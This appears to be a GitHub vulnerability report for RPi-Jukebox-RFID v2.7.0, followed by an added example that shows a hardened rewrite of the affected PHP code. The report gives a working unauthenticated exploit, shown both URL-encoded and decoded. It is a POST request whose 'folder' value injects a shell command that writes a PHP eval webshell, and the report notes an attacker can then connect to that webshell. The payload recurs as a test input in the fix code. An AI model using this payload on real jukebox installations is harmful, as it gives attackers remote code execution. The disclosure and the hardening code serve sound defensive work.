Open xjzzzxx opened 3 months ago
I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:
POST /htdocs/trackEdit.php
Data:
ACTION=trackDelete&deleteTrack=yes&folder=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell5%27%5d)+%3f%3e%22++%3e+.%2fshell5.php+%3b&filename=1%22
Here is Data without url encoding for ease of understanding:
ACTION=trackDelete&deleteTrack=yes&folder=hello" ; echo "<?php @eval(\$_POST['shell5']) ?>" > ./shell5.php ;&filename=1"
Manual verification
Version
v2.7.0
Branch
released
OS
ubuntu 22
Pi model
unknown
Hardware
No response
What happened?
Hello,
I would like to report an RCE vulnerability in RPi-Jukebox-RFID v2.7 (no permissions required).
Analysis
The vulnerable file: htdocs\trackEdit.php
The source is at Line 235 ($_POST['folder'] and $_POST['filename']). Then there are two check points (Line 232 and Line 233), which we bypass by setting $_POST['ACTION'] = trackDelete and $_POST['deleteTrack'] = yes. After bypassing the two check points, the tainted source passes to $exec and exec($exec); (Line 236) without any further check.
PoC
POST /htdocs/trackEdit.php
Data:
ACTION=trackDelete&deleteTrack=yes&folder=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell5.php+%3b&filename=1%22
Here is the version without url encoding for ease of understanding:
ACTION=trackDelete&deleteTrack=yes&folder=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell5.php ;&filename=1"
Manual verification
The attacker can then easily connect to this webshell (/htdocs/shell5.php).
Logs
No response
Configuration
No response
More info
No response
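Added example for maintainers (not code from the project or from the reporter): a hypothetical reconstruction of the vulnerable shape described in the analysis above, beside a hardened version that allowlists both parameters, confines the resolved path to the audio folder tree and deletes without a shell. The base path, the `rm` command and the function names are assumptions, since the report does not quote the source.

```php
<?php
// Added example, not the project's code. The vulnerable shape below is a
// reconstruction of what the report describes: POST values reach exec()
// through a shell string with no validation. $base, "rm" and the function
// names are assumptions. Requires PHP 8+ (str_starts_with).

$audiofolders = '/home/pi/RPi-Jukebox-RFID/shared/audiofolders'; // assumed base

// Vulnerable shape (do not use): a folder or filename containing '" ; ... ;'
// closes the quoted argument and the shell runs whatever follows.
function deleteTrackVulnerable(string $folder, string $filename, string $base): void {
    $exec = 'rm "' . $base . '/' . $folder . '/' . $filename . '"';
    exec($exec);
}

// Hardened: allowlist both values, resolve the path, confirm it stays inside
// the audio folder tree, then delete with unlink() instead of a shell command.
function deleteTrackSafe(string $folder, string $filename, string $base): bool {
    // Only letters, digits, space, dot, dash and underscore; no quotes,
    // semicolons, redirections or path separators can pass.
    $allowed = '/^[A-Za-z0-9 ._-]+$/';
    if (!preg_match($allowed, $folder) || !preg_match($allowed, $filename) ||
        str_starts_with($folder, '.') || str_starts_with($filename, '.')) {
        return false;
    }
    $baseReal = realpath($base);
    $target   = realpath($base . '/' . $folder . '/' . $filename);
    // realpath() returns false for a missing file and collapses any "..",
    // so a prefix check against the real base path is a reliable containment test.
    if ($baseReal === false || $target === false ||
        !str_starts_with($target, $baseReal . DIRECTORY_SEPARATOR)) {
        return false;
    }
    return unlink($target);
}

// If a shell command is unavoidable, every argument must be wrapped so the
// shell treats it as a single literal string.
function deleteTrackViaShell(string $path): void {
    exec('rm -- ' . escapeshellarg($path));
}

// Constructed input taken from the report's decoded payload: the allowlist
// check fails on the quote and semicolon, so nothing reaches the filesystem.
$payload = 'hello" ; echo "<?php @eval($_POST[\'pass\']) ?>" > ./shell5.php ;';
deleteTrackSafe($payload, '1"', $audiofolders);
```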